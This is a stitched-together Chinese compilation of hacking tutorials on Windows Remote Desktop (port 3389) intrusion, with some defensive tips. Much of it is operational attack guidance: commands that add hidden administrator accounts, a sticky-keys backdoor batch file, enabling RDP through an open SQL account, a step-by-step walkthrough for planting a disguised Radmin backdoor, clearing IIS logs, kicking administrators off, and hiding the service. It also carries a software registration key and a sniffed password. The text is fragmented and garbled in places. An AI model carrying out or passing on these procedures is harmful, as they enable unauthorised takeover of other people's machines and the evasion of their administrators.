黑客经验谈系列之入侵3389起源完整编
3389攻击原理
3389攻击原理
3389攻击原理是基于Windows终端服务(Terminal Services)的默认端口号3389进行的。
微软为了方便网络管理员远程管理及维护服务器而推出了这个服务,网络管理员可以使用远程桌面连接到网络上任意一台开启了终端服务的计算机上。
黑客在入侵了一台主机后,通常都会想办法先添加一个属于自己的后门账号,然后再开启对方的终端服务,这样,自己就可以随时使用终端服务来控制对方了。
这种主机的操作和控制就像操作自己的计算机一样方便。
由于终端服务的连接非常稳定,而且任何杀毒软件都不会查杀,所以也深受黑客喜爱。
这样的主机通常被称为“3389肉鸡”。
为了防范3389攻击,需要加强网络安全防护,定期更新操作系统和应用程序的安全补丁,限制不必要的远程访问和关闭不必要的端口和服务等措施。
同时,对于个人用户而言,也需要提高网络安全意识,不轻易打开未知来源的邮件和链接,及时更新防病毒软件等。
Windows作业系统的port139入侵
22
建立最高權限帳戶
* 原理與說明---Windows系統本身會提供一個小工具
net.exe,執行它即可建立最高權限帳戶
Net指令
這裡不變 密碼,自己取 用戶名稱自取
net user hacker 1234 /add
這裡不變
net localgroup administrators hacker /add
14
按確定
15
HKEY_LOCAL_MACHINE\SYSTEM\CurrentCo ntrolSet\Services\lanmanserver\shar es
16
5.WinNT、Win2K的預設共用漏洞
Windows 2000/XP/2003版本的作業系統提供了預設共 用功能,這些預設的共用都有“$”標誌,意為隱含的, 包括所有的邏輯硬碟(C$,D$,E$……)和系統目錄 Winnt或Windows(admin$)。 帶來的問題: 微軟的初衷是便於網管進行遠端管理,這雖然方便了 局域網用戶,但對我們個人用戶來說這樣的設定是不 安全的。如果電腦連上網路,網路上的任何人都可以 通過共用硬碟,隨意進入你的電腦。所以我們有必要 關閉這些共用。更為可怕的是,駭客可以通過連接你 的電腦實現對這些預設共用的入侵。
是否磁碟需要給其他 連線電腦使用? Y
N 關閉所有共享資源
N 使用Win9X or WinMe? Y 修補密碼漏洞
設定個別使用者權限與密碼 (Win2K/Win XP適用)
N 是否提供唯讀(Read Only) Y 設定只可唯讀
設定不易猜到的密碼與用戶 名稱
6
關閉Port 139
(2)此項目打勾取消 (3)按下此按鈕
黑客入侵技术及相关应对措施
黑客入侵技术及相关应对措施自动化0603 060901112 毛懿黑客是“Hacker”的音译,源于动词Hack,其引申意义是指“干了一件非常漂亮的事”。
这里说的黑客是指那些精于某方面技术的人,对于计算机而言,黑客就是精通网络、系统、外设以及软硬件技术的人。
随着时代的发展黑客行为有了以下的发展趋势。
1、手段高明化,逐步形成了团体,利用网络进行交流和团体攻击。
2、活动频繁化,做一个黑客已经不再需要掌握大量的计算机和网络知识,黑客工具的大众化是黑客活动频繁的主要原因。
3、动机复杂化,目前已不再局限于为了国家、金钱和刺激,还和国际的政治变化、紧急变化紧密的结合在一起。
黑客的攻击可以归纳为以下几步:信息搜集、实施攻击、善后处理。
信息搜集主要包括:系统管理员的信息,网络的拓扑结构,何种操作系统,目标网络上的服务器,可能的安全漏洞等。
信息搜集实现的方法:1、利用网上的公开协议或工具,如:Finger协议、SNMP协议、Traceroute程序等2、利用合适的扫描工具,如:利用ISS,SA TAN等,对整个网络或子网进行扫描,以寻找安全漏洞。
在我们实际的生活中我们也往往会常常会遇到这些问题。
1、木马入侵木马也许是我们最深恶痛绝的东西了,相信不少朋友都受到过它的骚扰。
木马有可能是黑客在已经获取我们操作系统可写权限的前提下,由黑客上传的(例如下面会提到的ipc$共享入侵);也可能是我们浏览了一些垃圾个人站点而通过网页浏览感染的(利用了ie漏洞);当然,最多的情况还是我们防范意识不强,随便运行了别人发来的所谓的好看的动画之类的程序或者是在不正规的网站上随便下载软件使用。
一旦被植入木马那么我们的掌上生活就好像是在别人的监视器下工作学习一样,不仅仅是被监控,同时木马的植入者可以在对于他们有力的时候侵入从而来获取他们的利益,当然也有些仅仅是抱着一种恶毒的心理,他们植入木马并不追求自己的利益而是乐于损坏人家的利益,那些木马自动运行的不仅仅是木马程序本身还有附带的大量的垃圾程序,通过木马的侵入在你自身最薄弱的地方撒野,这些垃圾程序由于有了木马打开了保护层而肆意妄为,最典型的就是最近几年比较流行的一种木马他先强迫解除管理器里面的杀毒软件和360的保护,从而使一些并不是很厉害的垃圾软件横行电脑,而正是由于这些保护措施的破坏直接导致了我们没有工具去进行清除,从而大大增加了工作量也正因为此大大提升了此木马的威力。
入侵个人主机网络攻击的步骤
入侵个人主机网络攻击的步骤第一步:隐藏自已的位置为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽量通过“跳板”或“肉鸡”展开攻击。
所谓“肉鸡”通常是指,HACK实现通过后门程序控制的傀儡主机,通过“肉鸡”开展的扫描及攻击,即便被发现也由于现场遗留环境的IP地址是“肉鸡”的地址而很难追查。
第二步:寻找目标主机并分析目标主机攻击者首先要寻找目标主机并分析目标主机。
在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。
当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。
此时,攻击者们会使用一些扫描器工具,以试图获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,开启了哪些服务,以及服务程序的版本等资料,为入侵作好充分的准备。
第三步:获取帐号和密码,登录主机攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。
这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。
当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。
第四步:获得控制权攻击者们利用各种工具或系统漏洞进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。
他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序,以便日后可以不被觉察地再次进入系统。
此外,为了避免目标主机发现,清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。
第五步:窃取网络资源和特权攻击者找到攻击目标后,会继续下一步的攻击。
如:下载敏感信息;窃取帐号密码、个人资料等。
三、网络攻击的原理和手法1、从扫描开始扫描往往是攻击的前奏,通过扫描,搜集目标主机的相关信息,以期寻找目标主机的漏洞。
入侵技巧
就省时间了,aspx, php的万能密码要熟记,现在还许多站,存在这个漏洞。
19 如果一个站无漏洞,又不想社工,也不想旁注,用iis写权限工具,测试一下,看看服务器有无写权限漏洞。机率小。
12。关于脚本小子,想成为职业选手,首先要熟悉工具,各种注入软件使用,各种提权工具使用。
13,关于ewbeditor和fck编辑器的路径要死背,熟记。如果一站,有编辑器你去首页,找到一个图片,点属性。看到路径后。
自己凭着对编辑器的路径的熟悉程度,直接输入进入。不要一看到编辑器,路径都不知道,还要去网上查,后台地址,数据库地址,基础的东西,一定器有没有别的站点,旁注。
4.如果拿到后台,还拿不了shell,首先你看是哪个牌子的源码,要是企业站,多是良精和南方数据库修改版。这两个源码
大部分都存在注入,后台上传,southidceditor编辑器漏洞等。后台有上传,就不要放弃,如果没编辑器,就把上传地址一个一个抓包,放在明小子上传测试。尤其那个良精修改版,企业站多了,漏洞百出。
5.有3389连不上,显示终端线数过多,什么的,这时,你有管理员账号,点mstsc输入mstsc console v:,你就是连上。
6.后台有上传,先不要抓包,先上传个asa的试试,我试过很多回,有的站能直接上传asa.
7.用啊d跑表,跑字段名name和pass出不来,显示超过50什么的,放在穿山甲去跑。
14老漏洞要熟记,自己搭建服务器一一测试,熟记。比如说,你拿一站后,如果是动网8.2的,看到以后,要立刻想起以前爆的洞,比如注入,比如上传,注入洞比较老,补丁肯定打了,注册一个用户,(个人空间有个上好,首先把一下常见知名的源码,比如动网从6.0-8.2,漏洞,一些漏洞要熟记。
3389端口入侵系统
图 2
3)上一步的目的在于用net.exe激活被禁止使用的guest账号。当然也可以填入“user 用户名 密码 /add”来创建一个新账号,不过莫明多出一个账户在实战当中容易引起网管的注意,导致入侵失败,此法实不可取。
4)双击运行该快捷方式,不要奇怪你没有看到运行状态,因为实际上guest账户已被激活了。现在需要再修改该快捷方式,填入“user guest 密码”点击“确定”。双击运行该快捷方式,现在guest账号已经有密码了。
2) 操作问题:如果你将鼠标指针点击在了“密码”旁边的空白栏处,输入法状态条是不会出现的,需要将鼠标点击在“用户名”旁边的空白栏。
2.用鼠标右键点击状态条上的微软徽标,选取“帮助”中的“操作指南”,在“输入法操作指南”的左上角点击鼠标右键,在弹出的菜单中选择“跳至URL(J)…”。接下来你将会看到Windows 2000的防止网络监听与端口扫描的方法系统安装路径和要求填入路径的窗口。
。
Step4:完全占领
控制服务器“肉鸡”
通过上面的操作,我们已经得到了一个系统管理员账号。接下来要想控制这台服务器就好办多了。打开远程终端管理程序,在登录画面出现后,填入用户名guest和你设的密码,点击“连接”,现在你看到什么了?对!这台服务器就是你的了。
net user username /active :yes(激活一个账号)
net user username password(设定账号密码)
net user username password /add(添加一个账号)
net localgroup localgroupname username /add(添加账号到某个组)
获取终端服务软件
黑 客 入 侵
• NT/2000 在提供了 ipc$ 功能的同时,在初 次 安装时还打开了 默认共享,即所有的逻 辑共享 (c$,d$,e$ …… ) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些, 微软的初衷都是为了方便管理员的管理, 但在有意无意中,导致了系统安全性的降 低。
空会话
• 使用挑战响应协议与进程机器建立一个会话的 1 )会话请求者(客户)向会话接收者(服务器) 传送一个数据包,请求安全隧道的建立; 2 )服务器产生一个随机的 64 位数(实现挑战)传 送回客户; 3 )客户取得这个由服务器产生的 64 位数,用试图 建立会话的帐号的口令打乱它,将结果返回到服 务器(实现响应);
常见的嗅探器软件
• Sniffer pro 功能强大,需要安装 • SqlServerSniffer 命令行方式,用于嗅探 SQLserver密码及SQLserver,不产生报告, 需在键入命令时重定位到文件 • FsSniffer 嗅探本机与局域网POP3和FTP的 用户名和密码,可以种植到目标机
telnet入侵工具
• Opentelnet
– 国内高手开发 – 可以解除NTLM认证 – 可以更改telnet端口号,迷惑管理员 – 也可以先尝试NTLM认证,失败后再去除
• 配套程序resumetelnet可以恢复NTLM
telnet高级入侵
• 工具
– X-Scan扫描弱口令主机 – Opentelnet去除NTLM – AProMan查杀进程,例如杀死杀毒进程 – Instsrv给主机安装服务
• 4 )服务器接受响应后发送给本地安全验证 ( LSA ), LSA 通过使用该用户正确的口 令来核实响应以便确认请求者身仹。如果 请求者的帐号是服务器的本地帐号,核实 本地发生;当对挑战的响应核实为正确后, 一个访问令牌产生,然后传送给客户。客 户使用这个访问令牌连接到服务器上的资 源直到建立的会话被终止。
浅谈基本入侵与防范
IDS Agent
集中式
•审计系统的配置和 脆弱性
分布式
•评估关键系统和数 据文件的一致性 •检测和分析用户和 系统的活动 •识别并反应已知的 攻击模式
层次式
•对非正常模式进行 统计分析 •收集入侵证据
漏洞检测系统
系统漏洞 应用程序漏洞
天津子公司
武汉子公司 温州总公司
温总仓
scanner
物流中心
13 上海监控中心
内部 入侵
防火墙策略
开启ARP防火墙防止嗅探入侵,设置严谨的包过 滤规则
发现入侵后的对策
首先要估计形势 当证实遭到入侵时,采取的第一步行动是尽可能快地估计入侵造成的破坏程度。
Snoop、lastcomm和ttywatch等
ProcessKill、 SysCheck等
杀死这个 进程切断 黑客与系 统的连接
内部入侵的基本防御
密码策略
定期更换及使用复杂的密码,含字母数字特殊字 符,位数在12位或以上,输入密码时可不按顺序 输入
端口策略
关闭或过滤危险和不常用的端口,例如TCP 135、 139、445、593、1025 、3389和 UDP 135、137 、138、445 端口等
漏洞策略
及时更新系统漏洞补丁和应用程序漏洞补丁,升 级应用软件或程序至最新版本
使用工具 询问他们 究竟想要 做什么
跟踪这个 连接找出 黑客的来 路和身份
ps、who、 Netstat及finger 等命令
修复安全漏洞并恢复系统不给黑客留有可乘之机
Thank You!
L/O/G/O
缓存区 溢出
ARP欺骗
ARP是一种将IP转化成以IP对应的网卡的物理地址的一 种协议;ARP欺骗就是在网络中发送虚假的ARP 请求, 接收主机在获得MAC地址时,有其他主机故意顶替目的 主机的MACபைடு நூலகம்址,就造成了数据包不能准确到达。导致 网络运行时快时慢不稳定,严重将造成网络瘫痪。
黑客利用嗅探数据入侵过程和解决方案
遇到一个客户的服务器被黑客利用嗅探数据入侵并用来挟持,对方还公布了具体的入侵过程,现在正好以他为实例来说下此类问题的处理方案!以下是黑客发来的入侵过程文档。
------------------------------------------------------------这里说下同机房是怎么拿到后台权限的?前提是你们的IP我知道,123.120.218.153就得看看这个IP段123.120.218.1-123.120.218.254 的机器网关是不是一个这里的默认网关就相当于我们的电脑网络连接- 本地连接- 支持-看到的默认网关,我这里是192.168.1.1 服务器IP都是独立的网关也是这下确定了我就得去入侵123.120.218.1-123.120.218.254这个段的服务器了这里就不说了,过程看情况,我搞到了3台这个段的机器,发现都是同个网关123.120.218.1 就确定了你的机器也在其中然后就利用工具cain4.9 还有hijack之类的ARP工具,扫描完同IP段你们的机器也获取了MAC 有3个IP那时你们用的后台是http://123.120.218.152:89 我嗅探http数据post 提交包当然选择89端口,3389终端端口也没改,就顺便嗅探了凌晨开始嗅探的,差不多第二天起来看数据就出来了。
其中就包括http://liyongzhi001:519A335B666C ... /admin365/Login.asp。
这里lizhongzhi001就是帐号密码当然是519A335B666C384还有扫了下网站的目录,发现居然还有http://123.120.218.152:89/wwwroot.rar拿后台权限没花多少时间,就3389密码我等了几天你们登录过才会嗅探到。
------------------------------------------------------------关于服务器的选择,我这里发现唯一,群英和数据中国的服务器都具有ARP 硬件防护你可以考虑这里的机器或者下次你租服务器时我去检测下,不用你租的服务器,我自己去弄都行告诉我IP段你们租的高防服务器也有防御,相对来说是最好的,毕竟价格在那里------------------------------------------------------------说说服务器密码:帐号最好别默认administrator 设置个别的名字,这个以防万一而已密码别太常用了,我设置密码都是乱输入的。
网络安全知识:走进黑客世界——了解入侵技巧背后的原理
网络安全知识:走进黑客世界——了解入侵技巧背后的原理随着互联网的日益普及,网络安全问题逐渐成为一个重要的话题。
黑客攻击、网络钓鱼、恶意软件等安全威胁层出不穷,给人们的日常生活和企业的经济利益带来了严重的威胁。
了解黑客入侵的技术原理,可以帮助我们更好地保护个人隐私和企业敏感数据。
本文将介绍一些黑客入侵技术的原理。
一、端口扫描端口扫描是入侵者最常使用的一种技术。
端口扫描基于TCP/IP协议,可以探测目标系统开放的服务和技术。
入侵者可以利用端口扫描工具探测目标系统开启的服务和服务版本,以查找系统漏洞。
当发现目标系统存在漏洞时,入侵者可以利用该漏洞实现攻击。
因此,端口扫描是黑客攻击中不可或缺的一环。
二、漏洞利用漏洞利用也是一个常用的攻击方式。
漏洞是系统、软件或硬件中的错误或漏洞,入侵者可以利用这些漏洞入侵目标系统,并获取系统的控制权。
漏洞利用可以帮助攻击者绕过身份验证、窃取敏感数据、传播恶意软件等。
漏洞利用技术的高超程度也是黑客攻击成功的重要因素之一。
三、社会工程学社会工程学是一种利用社会心理学原理和技术手段,通过与人进行交流、欺骗或诱骗,获取目标信息的技术。
社会工程学利用的是人的天性,通过操纵目标的心理,使其放下对自身信息的警惕,避免采取安全措施。
入侵者可以利用社会工程学技术获取目标系统的访问凭证,绕过防火墙、破解密码等。
由于这种攻击方式难以防范,因而社会工程学被认为是一个比技术漏洞更具威胁性的攻击方式。
四、拒绝服务攻击拒绝服务攻击(DDoS)是通过向目标主机发送大量的数据请求,并使其过载或宕机的网络攻击方式。
这种攻击不会直接入侵目标系统,但它可以使目标系统无法正常运行,从而造成经济损失和用户不满。
DDoS攻击通常遵循三阶段:recon,weaponize和execute。
在第一阶段,攻击者通过各种方法进行侦察,确定服务器的IP地址和应用程序。
在第二阶段,攻击者选择攻击方式,并利用工具包编写攻击代码。
“抓鸡”教程从入门到精通——小小鸟必看
“抓鸡”教程从入门到精通——小小鸟必看最近论坛搞了免费培训第一期活动,听说大家都用上了服务器,收获颇丰,日抓几千只也不是梦。
但是几个问题广大菜菜们要注意:(哈哈,我是鸟蛋,没有肉鸡的了,只是做一下学术交流,不要用砖拍我啊)1 怎样给肉鸡XP双开3389?2 怎样给2000 2003系统建立超级隐藏账户?3怎么清除入侵肉鸡或服务器的脚印?我从我们华夏论坛把这几个方面的贴子工具汇总了一下,实用为主,请菜友们看看全自动XP双开3389一键搞定。
经过本人多次测试~~100%没问题~(上传到空间里,结合远控的批量下载+运行``效果很不错。
)唯一不足就是会弹出一个cmd窗口~算小半个创作吧!注意:如果弹出cmd就被关了。
命令没有执行完,当然双开不成功。
就别来问我为什么开不了什么的了!!【黑客视频教程-建立超级隐藏帐户】华夏黑客同盟论坛 - 【黑客视频教程-建立超级隐藏帐户】清除日志什么是日志文件?它是一些文件系统集合,依靠建立起的各种数据的日志文件而存在。
在任何系统发生崩溃或需要重新启动时,数据就遵从日志文件中的信息记录原封不动进行恢复。
日志对于系统安全的作用是显而易见的,无论是网络管理员还是黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。
无论是攻还是防,日志的重要性由此可见。
下面我们就来简单讨论一下日志文件的清除方法。
一、日志文件的位置Windows 2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%system32config。
安全日志文件:%systemroot%system32configSecEvent.EVT系统日志文件:%systemroot%system32configSysEvent.EVT应用程序日志文件:%systemroot%system32configAppEvent.EVT有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。
(献给新手)SQL开3389入侵实例记录
执行成功,结果:
命令:echoTsEnable=on>>c:\duguxike追加写入
执行成功,结果:
[post]命令:typec:\duguxike看看duguxike里的内容是否正确
执行成功,结果:
[Components]
TsEnable=on
multi(0)disk(0)rdisk(0)partition(1)\WINNT="MicrosoftWindows2000Server"/fastdetect
命令:echo[Components]>c:\duguxike在c盘根目录建写入一个文件,文件名duguxike大家可以自己改为自己的
把一次从SQL开3389的记录过程发出来,望对新手有用
注://为注释
实例过程:
连接到主机:202。xxx。xxx。xxx//大家可以用sql连接器连上有空口令的sql肉机
命令:typec:\boot。ini输入命令,看系统,server版的才能开3389
执行成功,结果:
TsEnable=on
命令:sysocmgr/i:c:\winnt\inf\sysoc。inf/u:c:\duguxike/q开3389,成功的话过会肉机会重启!!
执行成功,结果:
GetLocalManagedApplicationsreturned(2)
本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接:/tech/2010-01-20/59015.html
[bootloader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
80端口、512端口、3389端口……入侵实例
80端⼝、512端⼝、3389端⼝……⼊侵实例有很多⽹站为了安全起见,在WEB Server前⾯架了防⽕墙,或者做了TCP/IP过滤,对外只开放TCP 80端⼝。
从⼊侵者⾓度来看,要⼊侵那么从80上跑的CGI⼊⼿是⽐较可⾏的,当然也可以⽤别的办法,例如旁敲侧击,呵呵。
从⽹管⾓度来看,⼀是要保证CGI的安全性,另外⽹络的整体安全性也是很重要的。
针对基于80端⼝⼊侵、防范⽽出的CGI扫描器数不胜数,但基本上原理都⼀样。
CGI扫描器原理说起来其实⾮常简单,可以⽤四句话来概括:连接⽬标WEB SERVER;发送⼀个特殊的请求;接收⽬标服务器返回数据;根据返回数据判断⽬标服务器是否有此CGI漏洞。
当管理的服务器达到⼀定数量的时候,⼿⼯检测⾃⼰的服务器是否存在各种各样的CGI漏洞,那就太消耗时间和精⼒了,所以⼀个⽹管⼿上有个⽐较好⽤的CGI漏洞扫描器还是必要的。
OK!今天我们就⾃⼰来动⼿⽤C写⼀个简单的CGI扫描器,帮助⾃⼰在⽇常⼯作中检测服务器:)) 源代码如下,很多地⽅我都加了注释,别嫌我烦哦:))编译好的程序可以从/program/cgicheck.exe 下载。
/************************************************************************* Module:CGICheck.cpp Author:ey4s Date:2001/5/16说明:这是⼀个Console下多线程,带有进度显⽰的CGI扫描器的模板,更改⼀下szSign和SendBuff就可以扫描其他CGI漏洞,设置了连接、发送、接收超时,速度还可以哦。
希望可以帮助到admins检测⾃⼰的服务器:)) *************************************************************************/ #i nclude #define iPort 80//⽬标Web Server端⼝#define szSign “500 13rnServer: Microsoft-IIS/5.0”//根据此标志来检查⽬标是否有漏洞 #pragma comment(lib,“ws2_32.lib”) /////////////////////////////////////////////////////////////////////////// // //定义&初始化全局变量// char *SendBuff=“GET /NULL.printern”,//发送的请求buff CurrentTarget[52]=,//存放最后⼀个线程将扫描的⽬标turn[4][2]=;//显⽰进度时的字符intSendBuffLen=strlen(SendBuff),//发送的buff长度iConnTimeout,//TCP Connect TimeOut ii=0,//扫描进度iTotal;//服务器总数HANDLE hSemaphore=NULL,//信标内核对象句柄,⽤来控制线程数量hStdout;//console标准输出句柄,做进度显⽰的时候⽤的struct timeval timeout;//连接、发送和接收的超时值DWORD SleepTime;//每个⼀个线程后等待的时间/* SleepTime值根据⽤户输⼊的线程数量[ThreadNum]和TCP ConnectTimeOut[CONNTIMEO]来计算。
实用的初级黑客入侵教程
要是有这样的提示:
主机:218.88.55.55 3389,windows 2000 advance server terminal 端口开放。 简单管理员密码:
好了,连上网(你不会连网都没连吧?)根据你机器的性能,把线程调下,就是拖那个小滑块,越往右线程越大,要是你的机器性能不好, 太大的线程会死机的!我的机器性能不错,我才用110左右的线程,并且有的时候我也会死机... ...(哭... ...)
ok!一切就绪!点"开始" . 接下来,接下来我们干什么呢?在qq上什么软件后,他还喋喋不休的问我"在哪下?把地址给我吧",太 懒了吧,难道下载地址在我脑子里?我不也是要搜吗?
好了,下边我们开始入侵了,下边就是过程:
第一步. 打开winntautoattack,就是那个手雷的标志,在"起始ip"里和"目标ip"里填上一个ip段,并且尽量把范围搞大点,比如在"起始 ip"里填"218.88.1.1",在"目标ip"里填"218.88.255.255".ip段建议下一个显ip的qq,参考你qq上好友的ip去填.中奖概率更大!勾 上"仅对ping检查成功的机器进行检测","检测3389端口"和"收集netbios信息"
第8个按纽,进入文件夹模式.上边的是你机器的文件夹,下边的当然是他的了,你可以在这里把你机器里的木马传到他机 器上,当然你要是发现他机器上有什么你想要的,也可以下下来,并且一切都在神不知鬼不觉当中(贼??)具体的做法?一 个字:拖!把你的文件用鼠标左键按着拖到下边他的文件夹上松开是上传,反过来就是下载了)方便吧?
专题二、3389 攻击与防范实用技巧
专题二、3389攻击与防范实用技巧Simeon(一)远程终端攻击防范实用技巧1.实用技巧之一修改默认端口默认状态下远程桌面使用的端口一般为“3389”,如果不及时将这个端口号码更改掉的话,那么许多别有用心的黑客可能会利用这个端口,来远程控制和入侵本地工作站,以便窃取保存在本地工作站中的各类隐私信息。
目前还有单独针对远程终端攻击的软件,如果您设置的密码碰巧在他的攻击字典中,那么很不幸的告诉你,你的计算机将被攻陷,有关这方面的详细技术细节请关注本专题的子专题——《来自俄罗斯黑客的秘密——3389口令暴力破解》,因此在系统管理中修改默认端口就非常有必要了。
修改默认端口3389为其他任意未使用的端口即可。
下面介绍两种方法来修改端口: (1)图形界面修改首先以特权身份(管理员)登录进本地工作站或者服务器系统,用单击系统桌面中的“开始”-“运行”命令,从弹出的系统运行框中,输入字符串命令“regedit ”,单击“确定”按钮后,打开本地工作站的系统注册表编辑界面;在该编辑界面的左侧显示区域,用鼠标展开HKEY_LOCAL_MACHINE 注册表分支,从其后弹出的分支列表中依次选中 SYSTEM\CurrentControlSetControl\Terminal Server\Wds\rdpwd\Tds\tcp 子键,在tcp 子键所对应的右侧显示区域中,我们会看到一个名为PortNumber 的子键(如图1所示),这个子键其实就是用来定义远程桌面端口号码的,默认是以十六进制显示为“0X00000D3D ”。
双击该键值即可将该子键的数值设置成其他端口号码,如图2所示,在数字数据中可以任意输入一个未使用的端口,一般设置大端口号即可,例如可以将其数值设置成“8888”。
图1 通过注册表查看3389的端口信息图2 修改3389的端口完成数值修改操作后,我们再将鼠标定位于注册表分支 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp ,在RDP-Tcp 子键所对应的右侧显示区域中,我们同样会看到一个名为PortNumber 的子键,把该子键的数值也要一并修改过来,例如这里我们也要将它的数值修改成“8888”。
教你怎样用粘滞键漏洞为肉鸡留后门,该技术也可破除开机密码
入侵过程:
1、本人创建一个bat文件,书写内容如下:
@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
我把它保存为5shift.bat。当我们运行它的时候,sethc.exe 就被换成了改了名的cmd.exe了。
2、哈哈,system权限的黑框框就这样弹出来啦,我们就可以自由的在这里创建管理员用户了,用到的命令为:
特别注意: 有过许多入侵经验的黑客们都会知道,系统文件夹下的指令和dll文件都是有恢复机制的! 就是不管你是删除了还是修改了c:/windows 或 c:/windows/system32
下的文件时,系统都会给你自动恢复成正常的! 原理是在c:/windows/system32/dllcache文件夹下,存在着windos内核所有的恢复文件! 所以我们只要先将这个文件夹删除了就可以用以上思路添加粘滞键漏洞了!
2、关机,切换到正常的windows系统,在密码输入界面中按5下shift就可以弹出黑框框了,然后添加账户,就能成功开机了,呵呵,这是不是破除开机密码的最巧妙的方法呢?!!
net user admin admin /add 添加admin用户,密码是admin
net localgroup administrators admin /add 提升为超级管理员
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
工具:WINNTAutoAttack自动攻击器(扫自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码:
08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWo mK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隐藏3389服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务及不让管理发现自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(开3389端口服务的);psu.exe(使用被禁止的Guest帐户要用到的);mstsc.exe(远程桌面连接程序)。
一.扫到SA弱口令(自动攻击器)
二.用SQLTOOLS连上去建一个用户
三.上传后门程序RAD.EXE(RADMIN服务端自解压程序)
制作RAD.EXE过程:
1、到Radmin安装目录下找到AdmDll.dll、raddrv.dll和r_sever.exe;
2、在本地设置服务端(一定要生成);
设置密码-->>设置连接端口(默认4489)-->>生成
3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg;
4
5
6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包;
7、将Rad.rar制作成自解压文件;
选择Default.sfx的自释放模块-->>高级自释放选项
-->>常规
释放路径:%systemroot%\\system32
安装程序:释放后运行:r.bat 释放前运行u.bat
-->>摸式
缄默模式:全部隐藏覆盖方式:覆盖所有文件
-->>确定-->>确定
生成完成。
四.用RADMIN客服端连接
上传文件到c:\\WINNT(XP是windows):
port.bat(如果是在XP下,这个要把里面的WINNT改为Windows)
query.exe quser.exe
SC.exe
CleanIISLog.exe.exe
3389.exe
psu.exe
最好再上传一个反弹后门RADMIN进入TELNET。
运行c:\\winnt\\3389.exe,重启肉鸡。
五.重启后用远程桌面远程器连上去
这里就有时会出现个问题。
使用3389登陆,发现登陆用户已满,不用怕,我们把他踢出去。
telnet对方ip,发现需要NTLM 身份验证。
我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。
找到c:\\winnt\\system32\\cmd.exe 建立一个快捷方式到桌面。
修改cmd的快捷方式属性为允许其他身份登陆。
然后运行桌面上的cmd.exe的快捷方式。
输入帐号mint密码mint,telnet 对方ip,直接可以登陆对方电脑了。
使用命令:
c:\\query user (查看对方目前终端登陆状况。
)
运行命令:
c:\\logoff 1(踢出去一个管理者)
再用c:\\query user检查一便~~(这就是为什么不马上用1.bat了)
六.连上后..在cmd下运行
c:\\winnt\\log . 自己的IP .(擦PP)
c:\\winnet\\1.bat (删除覆盖查看当前在线用户文件)
七.打SA空口令补丁
程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)
-->>Windowst身位验证登陆
复制一下代码:SELMIS
按F5(运行),关了退出SQL Server再用SQL Server身位验证进一次,退出(这是为了不留下记录)。
八.改3389端口和服务名称
修改服务器端的端口设置,注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal
Server\\Wds\\rdpwd\\Tds\\tcp],PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。
第二个地方:
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal
Server\\WinStations\\RDP-Tcp]PortNumber值,默认是3389,选择10进制,修改成所希望的端口,比如1314。
要重启系统才能用新端口连。
(不急..改了他的服务名再重启系统吧)
导出3389服务的
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]
的键值为mm.reg文件。
编辑mm.reg文件,替换TermService为Alerter(错误警告服务..别的服务..别的服务也行) 。
再把第十行的"Description"="(这里是服务说明,改为你所换的服务
说明,改为你所换的服务说明,这里改为通知所选用户和计算机有关系统管理级警报。
)"第十一行的"DisplayName"="(这里是服务名称,改为你所换的服务名称,改为你所换的服务名称,这里改为Alerter)。
保存,再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务管理器..把Alerter的服务先停止)。
再在CMD下
九.注消后(注消比直接关要好些)用Radmin重启肉鸡
